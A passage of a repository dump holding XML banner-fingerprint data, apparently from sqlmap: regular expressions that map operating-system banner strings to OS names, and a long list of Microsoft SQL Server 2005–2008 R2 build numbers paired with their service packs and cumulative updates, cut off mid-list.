 </regexp>\n\n    <regexp value=\"Windows.*\\b6\\.3\">\n        <info type=\"Windows\" distrib=\"2012 R2|8.1\"/>\n    </regexp>\n\n    <regexp value=\"Windows.*\\b6\\.2\">\n        <info type=\"Windows\" distrib=\"2012|8\"/>\n    </regexp>\n\n    <regexp value=\"Windows.*\\b6\\.1\">\n        <info type=\"Windows\" distrib=\"2008 R2|7\"/>\n    </regexp>\n\n    <regexp value=\"Windows.*\\b6\\.0\">\n        <info type=\"Windows\" distrib=\"2008|Vista\"/>\n    </regexp>\n\n    <regexp value=\"Windows.*\\b5\\.2\">\n        <info type=\"Windows\" distrib=\"2003\"/>\n    </regexp>\n\n    <regexp value=\"Windows.*\\b5\\.1\">\n        <info type=\"Windows\" distrib=\"XP\"/>\n    </regexp>\n\n    <regexp value=\"Windows.*\\b5\\.0\">\n        <info type=\"Windows\" distrib=\"2000\"/>\n    </regexp>\n\n    <regexp value=\"Windows.*\\b4\\.0\">\n        <info type=\"Windows\" distrib=\"NT 4.0\"/>\n    </regexp>\n\n    <regexp value=\"Windows.*\\b3\\.0\">\n        <info type=\"Windows\" distrib=\"NT 4.0\"/>\n    </regexp>\n\n    <regexp value=\"Windows.*\\b2\\.0\">\n        <info type=\"Windows\" distrib=\"NT 4.0\"/>\n    </regexp>\n\n    <!-- Linux -->\n\n    <regexp value=\"Linux\">\n        <info type=\"Linux\"/>\n    </regexp>\n\n    <regexp value=\"\\bArch\\b\">\n        <info type=\"Linux\" distrib=\"Arch\"/>\n    </regexp>\n\n    <regexp value=\"CentOS\">\n        <info type=\"Linux\" distrib=\"CentOS\"/>\n    </regexp>\n\n    <regexp value=\"Cobalt\">\n        <info type=\"Linux\" distrib=\"Cobalt\"/>\n    </regexp>\n\n    <regexp value=\"Conectiva\">\n        <info type=\"Linux\" distrib=\"Conectiva\"/>\n    </regexp>\n\n    <regexp value=\"Debian\">\n        <info type=\"Linux\" distrib=\"Debian\"/>\n    </regexp>\n\n    <regexp value=\"Fedora\">\n        <info type=\"Linux\" distrib=\"Fedora\"/>\n    </regexp>\n\n    <regexp value=\"Gentoo\">\n        <info type=\"Linux\" distrib=\"Gentoo\"/>\n    </regexp>\n\n    <regexp value=\"Knoppix\">\n        <info type=\"Linux\" distrib=\"Knoppix\"/>\n    </regexp>\n\n    <regexp value=\"Mandrake\">\n        <info type=\"Linux\" distrib=\"Mandrake\"/>\n    </regexp>\n\n    <regexp value=\"Manjaro\">\n        <info type=\"Linux\" distrib=\"Manjaro\"/>\n    </regexp>\n\n    <regexp value=\"Mandriva\">\n        <info type=\"Linux\" distrib=\"Mandriva\"/>\n    </regexp>\n\n    <regexp value=\"\\bMint\\b\">\n        <info type=\"Linux\" distrib=\"Mint\"/>\n    </regexp>\n\n    <regexp value=\"\\bPuppy\\b\">\n        <info type=\"Linux\" distrib=\"Puppy\"/>\n    </regexp>\n\n    <regexp value=\"Red[\\-\\_\\ ]?Hat\">\n        <info type=\"Linux\" distrib=\"Red Hat\"/>\n    </regexp>\n\n    <regexp value=\"Slackware\">\n        <info type=\"Linux\" distrib=\"Slackware\"/>\n    </regexp>\n\n    <regexp value=\"SuSE\">\n        <info type=\"Linux\" distrib=\"SuSE\"/>\n    </regexp>\n\n    <regexp value=\"Ubuntu\">\n        <info type=\"Linux\" distrib=\"Ubuntu\"/>\n    </regexp>\n\n    <!-- BSD -->\n\n    <regexp value=\"FreeBSD\">\n        <info type=\"FreeBSD\"/>\n    </regexp>\n\n    <regexp value=\"NetBSD\">\n        <info type=\"NetBSD\"/>\n    </regexp>\n\n    <regexp value=\"OpenBSD\">\n        <info type=\"OpenBSD\"/>\n    </regexp>\n\n    <!-- Mac OSX -->\n\n    <regexp value=\"Mac[\\-\\_\\ ]?OSX\">\n        <info type=\"Mac OSX\"/>\n    </regexp>\n\n    <regexp value=\"Darwin\">\n        <info type=\"Mac OSX\"/>\n    </regexp>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/mssql.xml",
    "content": "<?xml version=\"1.0\" ?>\n<root>\n    <signatures release=\"2008 R2\">\n        <signature>\n            <version>\n                10.50.2418\n            </version>\n            <servicepack>\n                1 CTP\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1797\n            </version>\n            <servicepack>\n                0+Cumulative Update 8\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1790\n            </version>\n            <servicepack>\n                0+Q2494086\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1777\n            </version>\n            <servicepack>\n                0+Cumulative Update 7\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1765\n            </version>\n            <servicepack>\n                0+Cumulative Update 6\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1753\n            </version>\n            <servicepack>\n                0+Cumulative Update 5\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1746\n            </version>\n            <servicepack>\n                0+Cumulative Update 4\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1734\n            </version>\n            <servicepack>\n                0+Cumulative Update 3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1720\n            </version>\n            <servicepack>\n                0+Cumulative Update 2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1702\n            </version>\n            <servicepack>\n                0+Cumulative Update 1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1600.1\n            </version>\n            <servicepack>\n                0\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.50.1450.3\n            </version>\n            <servicepack>\n                0\n            </servicepack>\n        </signature>\n    </signatures>\n    <signatures release=\"2008\">\n        <signature>\n            <version>\n                10.00.4311\n            </version>\n            <servicepack>\n                2+Q2494094\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.4285\n            </version>\n            <servicepack>\n                2+Cumulative Update 4\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.4279\n            </version>\n            <servicepack>\n                2+Cumulative Update 3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.4272\n            </version>\n            <servicepack>\n                2+Cumulative Update 2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.4266\n            </version>\n            <servicepack>\n                2+Cumulative Update 1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.4000\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2841\n            </version>\n            <servicepack>\n                1+Q2494100\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2821\n            </version>\n            <servicepack>\n                1+Cumulative Update 14\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2816\n            </version>\n            <servicepack>\n                1+Cumulative Update 13\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2808\n            </version>\n            <servicepack>\n                1+Cumulative Update 12\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2804\n            </version>\n            <servicepack>\n                0+Q2413738\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2799\n            </version>\n            <servicepack>\n                1+Cumulative Update 10\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2789\n            </version>\n            <servicepack>\n                1+Cumulative Update 9\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2775\n            </version>\n            <servicepack>\n                1+Cumulative Update 8\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2766\n            </version>\n            <servicepack>\n                1+Cumulative Update 7\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2760\n            </version>\n            <servicepack>\n                0+Q978839\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2758\n            </version>\n            <servicepack>\n                1+Q978791\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2757\n            </version>\n            <servicepack>\n                1+Cumulative Update 6\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2746\n            </version>\n            <servicepack>\n                1+Cumulative Update 5\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2740\n            </version>\n            <servicepack>\n                0+Q976761\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2734\n            </version>\n            <servicepack>\n                1+Cumulative Update 4\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2723\n            </version>\n            <servicepack>\n                1+Cumulative Update 3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2714\n            </version>\n            <servicepack>\n                1+Cumulative Update 2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2712\n            </version>\n            <servicepack>\n                0+Q970507\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2710\n            </version>\n            <servicepack>\n                1+Cumulative Update 1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.2531\n            </version>\n            <servicepack>\n                1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1835\n            </version>\n            <servicepack>\n                0+Cumulative Update 10\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1828\n            </version>\n            <servicepack>\n                0+Cumulative Update 9\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1823\n            </version>\n            <servicepack>\n                0+Cumulative Update 8\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1818\n            </version>\n            <servicepack>\n                0+Q973601\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1812\n            </version>\n            <servicepack>\n                0+Cumulative Update 6\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1806\n            </version>\n            <servicepack>\n                0+Cumulative Update 5\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1798\n            </version>\n            <servicepack>\n                0+Cumulative Update 4\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1787\n            </version>\n            <servicepack>\n                0+Cumulative Update 3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1779\n            </version>\n            <servicepack>\n                0+Q958186\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1771\n            </version>\n            <servicepack>\n                0+Q958611\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1763\n            </version>\n            <servicepack>\n                0+Q956717\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1755\n            </version>\n            <servicepack>\n                0+Q957387\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1750\n            </version>\n            <servicepack>\n                0+Q956718\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1600.22\n            </version>\n            <servicepack>\n                0\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1300.13\n            </version>\n            <servicepack>\n                February CTP\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1049.14\n            </version>\n            <servicepack>\n                July CTP\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                10.00.1019.17\n            </version>\n            <servicepack>\n                June CTP\n            </servicepack>\n        </signature>\n    </signatures>\n    <signatures release=\"2005\">\n        <signature>\n            <version>\n                9.00.5292\n            </version>\n            <servicepack>\n                4+Q2494123\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.5266\n            </version>\n            <servicepack>\n                4 Cumulative Update 3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.5254\n            </version>\n            <servicepack>\n                4 Cumulative Update 1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.5000\n            </version>\n            <servicepack>\n                4\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4912\n            </version>\n            <servicepack>\n                4 CTP\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4340\n            </version>\n            <servicepack>\n                3+Q2494112\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4325\n            </version>\n            <servicepack>\n                3+Q2438344\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4315\n            </version>\n            <servicepack>\n                3+Q2438344\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4311\n            </version>\n            <servicepack>\n                3+Q2345449\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4309\n            </version>\n            <servicepack>\n                3+Q2258854\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4305\n            </version>\n            <servicepack>\n                3+Q983329\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4294\n            </version>\n            <servicepack>\n                3+Q980176\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4285\n            </version>\n            <servicepack>\n                3+Q978915\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4278\n            </version>\n            <servicepack>\n                3+Q978791\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4273\n            </version>\n            <servicepack>\n                3+Q976951\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4266\n            </version>\n            <servicepack>\n                3+Q974648\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4230\n            </version>\n            <servicepack>\n                3+Q972511\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4226\n            </version>\n            <servicepack>\n                3+Q970279\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4224\n            </version>\n            <servicepack>\n                3+Q971409\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4220\n            </version>\n            <servicepack>\n                3+Q967909\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4216\n            </version>\n            <servicepack>\n                3+Q967101\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4211\n            </version>\n            <servicepack>\n                3+Q961930\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4207\n            </version>\n            <servicepack>\n                3+Q959195\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4053\n            </version>\n            <servicepack>\n                3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.4035\n            </version>\n            <servicepack>\n                3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3356\n            </version>\n            <servicepack>\n                2+Cumulative Update 17\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3355\n            </version>\n            <servicepack>\n                2+Q216793\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3330\n            </version>\n            <servicepack>\n                2+Q972510\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3328\n            </version>\n            <servicepack>\n                2+Q970278\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3327\n            </version>\n            <servicepack>\n                2+Q948567\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3325\n            </version>\n            <servicepack>\n                2+Q967908\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3320\n            </version>\n            <servicepack>\n                2+Q969142\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3318\n            </version>\n            <servicepack>\n                2+Q967199\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3315\n            </version>\n            <servicepack>\n                2+Q962970\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3310\n            </version>\n            <servicepack>\n                2+Q960090\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3303\n            </version>\n            <servicepack>\n                2+Q962209\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3302\n            </version>\n            <servicepack>\n                2+Q961479\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3301\n            </version>\n            <servicepack>\n                2+Q958735\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3295\n            </version>\n            <servicepack>\n                2+Q959132\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3294\n            </version>\n            <servicepack>\n                2+Q956854\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3291\n            </version>\n            <servicepack>\n                2+Q956889\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3289\n            </version>\n            <servicepack>\n                2+Q937137\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3282\n            </version>\n            <servicepack>\n                2+Q953752\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3261\n            </version>\n            <servicepack>\n                2+Q955754\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3260\n            </version>\n            <servicepack>\n                2+Q954950\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3259\n            </version>\n            <servicepack>\n                2+Q954669\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3257\n            </version>\n            <servicepack>\n                2+Q951217\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3253\n            </version>\n            <servicepack>\n                2+Q954054\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3244\n            </version>\n            <servicepack>\n                2+Q952330\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3242\n            </version>\n            <servicepack>\n                2+Q951190\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3240\n            </version>\n            <servicepack>\n                2+Q951204\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3239\n            </version>\n            <servicepack>\n                2+Q949095\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3235\n            </version>\n            <servicepack>\n                2+Q950189\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3232\n            </version>\n            <servicepack>\n                2+Q949959\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3231\n            </version>\n            <servicepack>\n                2+Q949687\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3230\n            </version>\n            <servicepack>\n                2+Q949199\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3228\n            </version>\n            <servicepack>\n                2+Q946608\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3224\n            </version>\n            <servicepack>\n                2+Q947463\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3222\n            </version>\n            <servicepack>\n                2+Q945640\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3221\n            </version>\n            <servicepack>\n                2+Q942908\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3215\n            </version>\n            <servicepack>\n                2+Q941450\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3209\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3208\n            </version>\n            <servicepack>\n                2+Q944902\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3206\n            </version>\n            <servicepack>\n                2+Q944677\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3205\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3203\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3200\n            </version>\n            <servicepack>\n                2+Q941450\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3195\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3194\n            </version>\n            <servicepack>\n                2+Q940933\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3186\n            </version>\n            <servicepack>\n                2+Q939562\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3182\n            </version>\n            <servicepack>\n                2+Q940128\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3180\n            </version>\n            <servicepack>\n                2+Q939942\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3179\n            </version>\n            <servicepack>\n                2+Q938243\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3178\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3177\n            </version>\n            <servicepack>\n                2+Q939563\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3175\n            </version>\n            <servicepack>\n                2+Q936305\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3171\n            </version>\n            <servicepack>\n                2+Q937745\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3169\n            </version>\n            <servicepack>\n                2+Q937041\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3166\n            </version>\n            <servicepack>\n                2+Q936185\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3162\n            </version>\n            <servicepack>\n                2+Q932610\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3161\n            </version>\n            <servicepack>\n                2+Q935356\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3159\n            </version>\n            <servicepack>\n                2+Q934459\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3156\n            </version>\n            <servicepack>\n                2+Q934226\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3155\n            </version>\n            <servicepack>\n                2+Q933549\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3154\n            </version>\n            <servicepack>\n                2+Q934106\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3153\n            </version>\n            <servicepack>\n                2+Q933564\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3152\n            </version>\n            <servicepack>\n                2+Q933097\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3080\n            </version>\n            <servicepack>\n                2+Q970895\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3077\n            </version>\n            <servicepack>\n                2+Q960089\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3073\n            </version>\n            <servicepack>\n                2+Q954606\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3054\n            </version>\n            <servicepack>\n                2+Q934458\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3050\n            </version>\n            <servicepack>\n                2+Q933508\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3043\n            </version>\n            <servicepack>\n                2+Q933508\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3042\n            </version>\n            <servicepack>\n                'Fixed' 2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3033\n            </version>\n            <servicepack>\n                2 CTP\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3027\n            </version>\n            <servicepack>\n                2 CTP\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.3026\n            </version>\n            <servicepack>\n                1+Q929376\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2249\n            </version>\n            <servicepack>\n                1+Q948344\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2245\n            </version>\n            <servicepack>\n                1+Q933573\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2243\n            </version>\n            <servicepack>\n                1+Q944968\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2242\n            </version>\n            <servicepack>\n                1+Q943389\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2239\n            </version>\n            <servicepack>\n                1+Q940961\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2237\n            </version>\n            <servicepack>\n                1+Q940719\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2236\n            </version>\n            <servicepack>\n                1+Q940287\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2234\n            </version>\n            <servicepack>\n                1+Q937343\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2233\n            </version>\n            <servicepack>\n                1+Q933499\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2232\n            </version>\n            <servicepack>\n                1+Q937277\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2231\n            </version>\n            <servicepack>\n                1+Q934812\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2230\n            </version>\n            <servicepack>\n                1+Q936179\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2229\n            </version>\n            <servicepack>\n                1+Q935446\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2227\n            </version>\n            <servicepack>\n                1+Q934066\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2226\n            </version>\n            <servicepack>\n                1+Q933762\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2224\n            </version>\n            <servicepack>\n                1+Q932990\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2223\n            </version>\n            <servicepack>\n                1+Q932393\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2221\n            </version>\n            <servicepack>\n                1+Q931593\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2219\n            </version>\n            <servicepack>\n                1+Q931329\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2218\n            </version>\n            <servicepack>\n                1+Q931843\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2216\n            </version>\n            <servicepack>\n                1+Q931821\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2215\n            </version>\n            <servicepack>\n                1+Q931666\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2214\n            </version>\n            <servicepack>\n                1+Q929240\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2211\n            </version>\n            <servicepack>\n                1+Q930283\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2209\n            </version>\n            <servicepack>\n                1+Q929278\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2208\n            </version>\n            <servicepack>\n                1+Q929179\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2207\n            </version>\n            <servicepack>\n                1+Q928394&lt;\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2206\n            </version>\n            <servicepack>\n                1+Q928539\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2202\n            </version>\n            <servicepack>\n                1+Q927643\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2201\n            </version>\n            <servicepack>\n                1+Q927289\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2198\n            </version>\n            <servicepack>\n                1+Q926773\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2196\n            </version>\n            <servicepack>\n                1+Q926285\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2195\n            </version>\n            <servicepack>\n                1+Q926240\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2194\n            </version>\n            <servicepack>\n                1+Q925744\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2192\n            </version>\n            <servicepack>\n                1+Q924954\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2191\n            </version>\n            <servicepack>\n                1+Q925135\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2190\n            </version>\n            <servicepack>\n                1+Q925227\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2189\n            </version>\n            <servicepack>\n                1+Q925153\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2187\n            </version>\n            <servicepack>\n                1+Q923849\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2183\n            </version>\n            <servicepack>\n                1+Q929404\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2181\n            </version>\n            <servicepack>\n                1+Q923624\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2176\n            </version>\n            <servicepack>\n                1+Q923296\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2175\n            </version>\n            <servicepack>\n                1+Q922578\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2174\n            </version>\n            <servicepack>\n                1+Q922063\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2167\n            </version>\n            <servicepack>\n                1+Q920974\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2164\n            </version>\n            <servicepack>\n                1+Q919636\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2156\n            </version>\n            <servicepack>\n                1+Q919611\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2153\n            </version>\n            <servicepack>\n                1+builds 1531\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2050\n            </version>\n            <servicepack>\n                1+.NET Vulnerability fix\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2047\n            </version>\n            <servicepack>\n                1 0\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2040\n            </version>\n            <servicepack>\n                1 CTP\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.2029\n            </version>\n            <servicepack>\n                1 Beta\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1561\n            </version>\n            <servicepack>\n                0+Q932556\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1558\n            </version>\n            <servicepack>\n                0+Q926493\n            